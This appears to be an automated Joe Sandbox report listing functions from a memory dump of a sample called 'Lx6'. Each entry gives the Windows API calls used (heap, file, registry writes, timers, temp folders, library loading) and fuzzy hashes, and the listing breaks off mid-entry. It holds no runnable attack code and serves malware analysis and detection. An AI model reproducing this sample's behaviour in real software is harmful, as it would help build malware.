Function 00763149 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0076592E: RtlEnterCriticalSection.NTDLL(00778448), ref: 00765936
Part of subcall function 0076592E: RtlLeaveCriticalSection.NTDLL(00778448), ref: 0076594B
Part of subcall function 0076592E: InterlockedIncrement.KERNEL32(0000001C), ref: 00765964

RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 00763186
memset.NTDLL ref: 00763197
lstrcmpi.KERNEL32(?,?), ref: 007631D7
RtlAllocateHeap.NTDLL(00000000,?), ref: 00763203
memcpy.NTDLL(00000000,?,?), ref: 00763217
memset.NTDLL ref: 00763224
memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 0076323D
memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 00763260
HeapFree.KERNEL32(00000000,?), ref: 0076327D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 694413484-0
Opcode ID: c973315ef5b3817aa036ef1c7727ae8dacb534415e64ebe3c755602480e87674
Instruction ID: 98afd16db6095734a9e247acd70a2b191bba043f1a7bde16fb2bfc5c04544cbd
Opcode Fuzzy Hash: c973315ef5b3817aa036ef1c7727ae8dacb534415e64ebe3c755602480e87674
Instruction Fuzzy Hash: 2E41CF72D0020DEFEB109FA4DC88A9D7BB9FF05354F148029E91AA7250D73DAE49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0075B614 Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,?), ref: 0075B62B
lstrlen.KERNEL32(?), ref: 0075B633
lstrlen.KERNEL32(?), ref: 0075B69E
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075B6C9
memcpy.NTDLL(00000000,00000002,?), ref: 0075B6DA
memcpy.NTDLL(00000000,?,?), ref: 0075B6F0
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0075B702
memcpy.NTDLL(00000000,007733F8,00000002,00000000,?,?,00000000,?,?), ref: 0075B715
memcpy.NTDLL(00000000,?,00000002), ref: 0075B72A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 55b3d918e3eb386288818cca31303535c309f48a9696104ee5827f86f213a632
Instruction ID: 56007c9062b48786a71e81d156b03905aa6f7afb83891761380f146f6e16e7c5
Opcode Fuzzy Hash: 55b3d918e3eb386288818cca31303535c309f48a9696104ee5827f86f213a632
Instruction Fuzzy Hash: 99416BB2D0020EEBCF01CFA8CC859AEBBB8EF48344F144466ED05A7211E779DA54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00755541 Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0076592E: RtlEnterCriticalSection.NTDLL(00778448), ref: 00765936
Part of subcall function 0076592E: RtlLeaveCriticalSection.NTDLL(00778448), ref: 0076594B
Part of subcall function 0076592E: InterlockedIncrement.KERNEL32(0000001C), ref: 00765964

RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00755592
lstrlen.KERNEL32(00000008,?,?,?,0076DFBE,00000000,00000000,-00000008), ref: 007555A1
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 007555B3
HeapFree.KERNEL32(00000000,00000000,?,?,?,0076DFBE,00000000,00000000,-00000008), ref: 007555C3
memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,0076DFBE,00000000,00000000,-00000008), ref: 007555D5
lstrcpy.KERNEL32(00000020), ref: 00755607
RtlEnterCriticalSection.NTDLL(00778448), ref: 00755613
RtlLeaveCriticalSection.NTDLL(00778448), ref: 0075566B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: f704aeaf7adb672de48db123daf534bed98486ad7d6aa471878c7feff3154aa5
Instruction ID: 61f2a8142d0d0635dbe6f35825ac2ae66466648d8502fc775187cfab610715a9
Opcode Fuzzy Hash: f704aeaf7adb672de48db123daf534bed98486ad7d6aa471878c7feff3154aa5
Instruction Fuzzy Hash: C641AC71500B05EFDB218F64DC48B9ABBF5FB04796F108119F80997210DBB8DA98CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0076C1EF Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E707: RtlAllocateHeap.NTDLL(00000000,?), ref: 0075E739
Part of subcall function 0075E707: HeapFree.KERNEL32(00000000,00000000,?,?,007676DA,?,00000022), ref: 0075E75E

Part of subcall function 0075208A: HeapFree.KERNEL32(00000000,00000000,?), ref: 007520C6
Part of subcall function 0075208A: HeapFree.KERNEL32(00000000,?,?,00000001), ref: 00752119

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,00000022,00000000), ref: 0076C261
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,00000022,00000000), ref: 0076C269
lstrlen.KERNEL32(?), ref: 0076C273
RtlAllocateHeap.NTDLL(00000000,?), ref: 0076C288
wsprintfA.USER32 ref: 0076C2C4
HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0076C2E3
HeapFree.KERNEL32(00000000,?), ref: 0076C2F8
HeapFree.KERNEL32(00000000,?), ref: 0076C305
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,00000022,00000000), ref: 0076C313

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID:
API String ID: 168057987-0
Opcode ID: 71e430412f3181a8bf93dd90c6041e169d6930f5c532f0b5e0f690f80f471dbd
Instruction ID: 4a012adf33b1d4b5d36cf9eb279f8c48f250aad4d9b4b558b24ac7027d3480f4
Opcode Fuzzy Hash: 71e430412f3181a8bf93dd90c6041e169d6930f5c532f0b5e0f690f80f471dbd
Instruction Fuzzy Hash: 5A31E431600315BFDB11AF60DC49E6BBBE8FF48754F00492AF949A2161DB788948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00755697 Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 007556D7
GetLastError.KERNEL32(?,00000080,00000000), ref: 007556E1
WaitForSingleObject.KERNEL32(000000C8,?,00000080,00000000), ref: 00755706
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,00000080,00000000), ref: 00755729
SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,00000080,00000000), ref: 00755751
WriteFile.KERNEL32(?,00001388,?,?,00000000,?,00000080,00000000), ref: 00755766
SetEndOfFile.KERNEL32(?,?,00000080,00000000), ref: 00755773
GetLastError.KERNEL32(?,00000080,00000000), ref: 0075577F
CloseHandle.KERNEL32(?,?,00000080,00000000), ref: 0075578B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 83f0a8059293437ae9a87862be3d196148104ae3c9f9e5454fee03b786df1525
Instruction ID: 100dac98693d7d5228b20ed545181066d1314730bdce69e3658d4e7cbfb058c5
Opcode Fuzzy Hash: 83f0a8059293437ae9a87862be3d196148104ae3c9f9e5454fee03b786df1525
Instruction Fuzzy Hash: DC317C31900208FFEB109FA4DC49BEE7B79EF08366F208554F915A61E0C7B84E98EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00751BC3 Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,0076DDAC,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 00751BE2
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 00751C16
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 00751C1E
GetLastError.KERNEL32 ref: 00751C28
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 00751C44
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 00751C5D
CancelIo.KERNEL32(?), ref: 00751C72
CloseHandle.KERNEL32(?), ref: 00751C82
GetLastError.KERNEL32 ref: 00751C8A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 5e05a70a78f04794523682d7921bb0edffe7bf3ac9ca1b8a872655f1a2e715ab
Instruction ID: 4fb123d63809bf57ec6526cb7be0316a467a74de38d71cbf64bb3224e8160690
Opcode Fuzzy Hash: 5e05a70a78f04794523682d7921bb0edffe7bf3ac9ca1b8a872655f1a2e715ab
Instruction Fuzzy Hash: E0218331940118FFDB019F68DC889EE7B7AFB44352F408025FD1AD2150D7798A85DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0076D2DA Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0076D2E6
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0076D2FC
_snwprintf.NTDLL ref: 0076D321
CreateFileMappingW.KERNEL32(000000FF,00778208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0076D33D
GetLastError.KERNEL32 ref: 0076D34F
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0076D366
CloseHandle.KERNEL32(00000000), ref: 0076D387
GetLastError.KERNEL32 ref: 0076D38F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 055e58abf0958a1827522c165e0ab106377755b0d8cb4fb05b7edb42a45743d5
Instruction ID: c5c999efdeb0c62381cca388174ed4f2c130408596a3c4416d0fce701acb373a
Opcode Fuzzy Hash: 055e58abf0958a1827522c165e0ab106377755b0d8cb4fb05b7edb42a45743d5
Instruction Fuzzy Hash: AD21EB76B40204FBD7319B69DC05F9D377AAB84790F204120FA0AEB2D0DA78DE41D755

Uniqueness

Uniqueness Score: -1.00%

Function 00767E64 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 200timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

FileTimeToLocalFileTime.KERNEL32(00000000,Pv), ref: 00767EC6
FileTimeToSystemTime.KERNEL32(Pv,?), ref: 00767ED4
lstrlenW.KERNEL32(00000010), ref: 00767EE4
lstrlenW.KERNEL32(00000218), ref: 00767EF0
FileTimeToLocalFileTime.KERNEL32(00000008,Pv), ref: 00767FDD
FileTimeToSystemTime.KERNEL32(Pv,?), ref: 00767FEB

Strings

Pv, xrefs: 00767FD5, 00767FE7, 00767EC1, 00767ED0, 00767EC4, 00767ED3, 00767FD8, 00767FEA

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Time$File$LocalSystemlstrlen$AllocateHeap
String ID: Pv
API String ID: 1122361434-4044084633
Opcode ID: 0c1f48be7c49c23b902f504bd04e64f649edc8fdafecc2cb6f86637a07534a46
Instruction ID: b80eda1ab123cd1d73bad5968cbf6e145eff40af7c6dba170d2806c5140566ca
Opcode Fuzzy Hash: 0c1f48be7c49c23b902f504bd04e64f649edc8fdafecc2cb6f86637a07534a46
Instruction Fuzzy Hash: 92711B7190021AABCB50DBA8C884EEEB7FCAB08344F144566F905E7251EB38DA85DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0076ECC1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

&w, xrefs: 0076ED97

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID:
String ID: &w
API String ID: 0-3400792137
Opcode ID: 848203e375c70785f3f6b1ba1b50765e5fb9d77c8eb9c71c910dcb0bde9f034f
Instruction ID: 76fa344e6f0d9edb1f9f0d8637db37d463c31c5ec77c275e64db44faa3debdff
Opcode Fuzzy Hash: 848203e375c70785f3f6b1ba1b50765e5fb9d77c8eb9c71c910dcb0bde9f034f
Instruction Fuzzy Hash: 1B41B1B5600714DFD320AF348C8D96BB7E8FB44365B104A3DFAAB87190DB789845CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0076BF9A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0076BFB4
CreateWaitableTimerA.KERNEL32(00778208,00000003,?), ref: 0076BFD1
GetLastError.KERNEL32(?,?,007685A2,?,?,?,00000000,?,?,?,?,?,?), ref: 0076BFE2

Part of subcall function 0075DCFB: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,00000001,00000000,00000000,?,74715520,00000000,?,?,?,0075508A,?), ref: 0075DD33
Part of subcall function 0075DCFB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0075DD47
Part of subcall function 0075DCFB: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00000001,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD61
Part of subcall function 0075DCFB: RegCloseKey.KERNEL32(?,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD8B

GetSystemTimeAsFileTime.KERNEL32(?,00000000,007685A2,?,?,?,007685A2,?), ref: 0076C022
SetWaitableTimer.KERNEL32(00000000,007685A2,00000000,00000000,00000000,00000000,?,?,007685A2,?), ref: 0076C041
HeapFree.KERNEL32(00000000,007685A2,00000000,007685A2,?,?,?,007685A2,?), ref: 0076C057

Strings

W"w, xrefs: 0076BFFD

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID: W"w
API String ID: 1835239314-4284564376
Opcode ID: 663ef61a41fc24a31f47d9f3fedd7cea3a2e014642833bb631bf8570f75bb5b3
Instruction ID: 19edd4bd73a24d81acc8c054084593cb2bd0a79ad37a055955296027edf28f86
Opcode Fuzzy Hash: 663ef61a41fc24a31f47d9f3fedd7cea3a2e014642833bb631bf8570f75bb5b3
Instruction Fuzzy Hash: 87314F71900208EBCF22DFA9CD89CBFBBB9FB85741B208055F886A6151D7389E44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00754792 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,00761DA0,00000000,7476F5B0,0075AE6D,?,00000000,?,?,0075DA8B,?,?,?), ref: 007547B2
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 007547C7
LoadLibraryA.KERNEL32(?,?,00000000,?,?,0075DA8B,?,?,?), ref: 007547E3
GetProcAddress.KERNEL32(00000000,?), ref: 007547F8
GetProcAddress.KERNEL32(00000000,?), ref: 0075480C

Strings

0xw, xrefs: 0075485F
0xw, xrefs: 00754866

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: 0xw$0xw
API String ID: 1469910268-3140486087
Opcode ID: 12143c6c90d8deff3a787078337132c089a665755b07b1e381358b5f9b657ca2
Instruction ID: 33865a2239dc298f78639f872d161b05f4c697929e56042386b9303d8384028f
Opcode Fuzzy Hash: 12143c6c90d8deff3a787078337132c089a665755b07b1e381358b5f9b657ca2
Instruction Fuzzy Hash: 6B3184316402089FDB45CF6CEC89E5533E9FB49394B41C159E50DDB361DB7CA886CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0075D191 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E53C
Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E555
Part of subcall function 0076E52A: GetCurrentThreadId.KERNEL32 ref: 0076E562
Part of subcall function 0076E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E56E
Part of subcall function 0076E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E57C
Part of subcall function 0076E52A: lstrcpy.KERNEL32(00000000), ref: 0076E59E

lstrcpy.KERNEL32(-000000FC,00000000), ref: 0075D1CB
CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,00756D0C,?,?,?), ref: 0075D1DD
GetTickCount.KERNEL32 ref: 0075D1E8
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,00756D0C,?,?,?), ref: 0075D1F4
lstrcpy.KERNEL32(00000000), ref: 0075D20E

Strings

\Low, xrefs: 0075D1BD
W"w, xrefs: 0075D1A6

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: W"w$\Low
API String ID: 1629304206-2497375991
Opcode ID: d6aef4e489fb7700528bd163e1240d3e7f0be4b46c4fccc36bf772b21a6ce85c
Instruction ID: ffac0ff933415f203868d6523de6ca9c197b29b0d7720ae42bd723ce801768ca
Opcode Fuzzy Hash: d6aef4e489fb7700528bd163e1240d3e7f0be4b46c4fccc36bf772b21a6ce85c
Instruction Fuzzy Hash: 6601D231201A24ABD6316BB59C0DFAB779CEF067D2F018024F904D7291CB5CDE05C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 0075F2AE Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0076F514: RegCreateKeyA.ADVAPI32(80000001,03F0B7F0,03F0C314), ref: 0076F529
Part of subcall function 0076F514: lstrlen.KERNEL32(03F0B7F0,00000000,00000000,0077706E,?,?,?,007632F0,00000001,00000000,03F0C314), ref: 0076F552

RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 0075F2F3
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0075F30B
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F36D
RtlAllocateHeap.NTDLL(00000000,?), ref: 0075F381
WaitForSingleObject.KERNEL32(00000000,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F3D3
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F3FC
HeapFree.KERNEL32(00000000,0075D497,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F40C
RegCloseKey.ADVAPI32(007633D4,?,00000000,?,007633D4,0075D497,00000000,00000001,00756FCB,00000000), ref: 0075F415

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: 066fc54ed81a68ffa2200b36fb0ee1d9394c175e784f5e436e4e317c4fa3aa05
Instruction ID: c0032ee30e2386932acf3dee54b3bb2bce49c6b21bdaf70e160cd91482be68ba
Opcode Fuzzy Hash: 066fc54ed81a68ffa2200b36fb0ee1d9394c175e784f5e436e4e317c4fa3aa05
Instruction Fuzzy Hash: 5E41D7B5D00219EFEF019FE4DC848EEBB79FB08345F20847AE905A2120D7794E99DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00762F92 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 122stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00772225), ref: 00762FB4
lstrlenW.KERNEL32(?,?,00000000,00772225), ref: 00762FC5
lstrlenW.KERNEL32(?,?,00000000,00772225), ref: 00762FD7
lstrlenW.KERNEL32(?,?,00000000,00772225), ref: 00762FE9
lstrlenW.KERNEL32(?,?,00000000,00772225), ref: 00762FFB
lstrlenW.KERNEL32(?,?,00000000,00772225), ref: 00763007

Strings

20u, xrefs: 00763015, 0076307F
20u, xrefs: 00763090

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: 20u$20u
API String ID: 1659193697-1615772096
Opcode ID: 0e9aa86f0b1c77aa38ae1430f02b028cdeef6561d2cb03b1d9412b7c19d8bcea
Instruction ID: 2944ed6676c3302ef2d6d875b001d78f989d0f8cb7f1754d7f58ef5806326b26
Opcode Fuzzy Hash: 0e9aa86f0b1c77aa38ae1430f02b028cdeef6561d2cb03b1d9412b7c19d8bcea
Instruction Fuzzy Hash: E9415371E0060AAFCB50DF99C8849AEB7FABF58344B148869E916E3201D778DA05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00762197 Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,00759F5A), ref: 007621AD
wsprintfA.USER32 ref: 007621D5
lstrlen.KERNEL32(?), ref: 007621E4

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

wsprintfA.USER32 ref: 00762224
wsprintfA.USER32 ref: 00762259
memcpy.NTDLL(00000000,?,?), ref: 00762266
memcpy.NTDLL(00000008,007733F8,00000002,00000000,?,?), ref: 0076227B
wsprintfA.USER32 ref: 0076229E

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 08841cca831c73a502a7c6feb1e552065ff83a83f227a5ab44a60819bc60804e
Instruction ID: eb2ac975c9f97cf3e89cf3d726d900a11592169b2bf920f5eb6e49f08c6730f0
Opcode Fuzzy Hash: 08841cca831c73a502a7c6feb1e552065ff83a83f227a5ab44a60819bc60804e
Instruction Fuzzy Hash: D9414E71A0010AEFDB54DF98DC85EAAB7FDEF08344B108065E919D7211EA38EE05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0076F714 Relevance: 12.1, APIs: 8, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(76B324D0,0000002C,00000000,74715520,74DFD3B0,00000001), ref: 0076F745
StrChrA.SHLWAPI(00000001,0000002C), ref: 0076F758
StrTrimA.SHLWAPI(76B324D0,?), ref: 0076F77B
StrTrimA.SHLWAPI(00000001,?), ref: 0076F78A
lstrlen.KERNEL32(74714D40), ref: 0076F7BF
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0076F7D2
lstrcpy.KERNEL32(00000004,74714D40), ref: 0076F7F0
HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 0076F814

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID:
API String ID: 1974185407-0
Opcode ID: c8f6762a8e26f777c9bd00fcda228eed302490beb6faed7010ef5eadf8c14d5f
Instruction ID: 91d87722d4226ffcd710f305480a6935694aed7080f912c8883d08cf96e481c7
Opcode Fuzzy Hash: c8f6762a8e26f777c9bd00fcda228eed302490beb6faed7010ef5eadf8c14d5f
Instruction Fuzzy Hash: 4E31B575900209FFDB519FA4EC49EAE7BB9EF09740F1480AAF809D7210D7789D40DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0075CE1C Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0075CE40
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0075CE52
wcstombs.NTDLL ref: 0075CE60
lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 0075CE84
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0075CE99
mbstowcs.NTDLL ref: 0075CEA6
HeapFree.KERNEL32(00000000,00000000), ref: 0075CEB8
HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0075CED2

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: c3e09f90bb6742b169aa59c3fa2614273226628199288846c0e61e41c1148f02
Instruction ID: e9b5a1ed5dc9b9bac0c39cb99359c692fd937cfccc31e92f95ac70acabcb7544
Opcode Fuzzy Hash: c3e09f90bb6742b169aa59c3fa2614273226628199288846c0e61e41c1148f02
Instruction Fuzzy Hash: 0B215071500209FFDF119FA4EC09F9F7BB9FB44345F108126F90496160DB799A94EB64

Uniqueness

Uniqueness Score: -1.00%

Function 0075EFCF Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0075EED0,00000000,00000000,00778460,?,?,0075DE1C,0075EED0,00000000,0075EED0,00778440), ref: 0075EFE2
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0075EFF0
wsprintfA.USER32 ref: 0075F00C
RegCreateKeyA.ADVAPI32(80000001,00778440,00000000), ref: 0075F024
lstrlen.KERNEL32(?), ref: 0075F033
RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0075F041
RegCloseKey.ADVAPI32(?), ref: 0075F04C
HeapFree.KERNEL32(00000000,00000000), ref: 0075F05B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
String ID:
API String ID: 1575615994-0
Opcode ID: 7548cffac7ef2d06ec27d11f809e5d7d1fc94eb8e02ba572d3ec065b66f9f36a
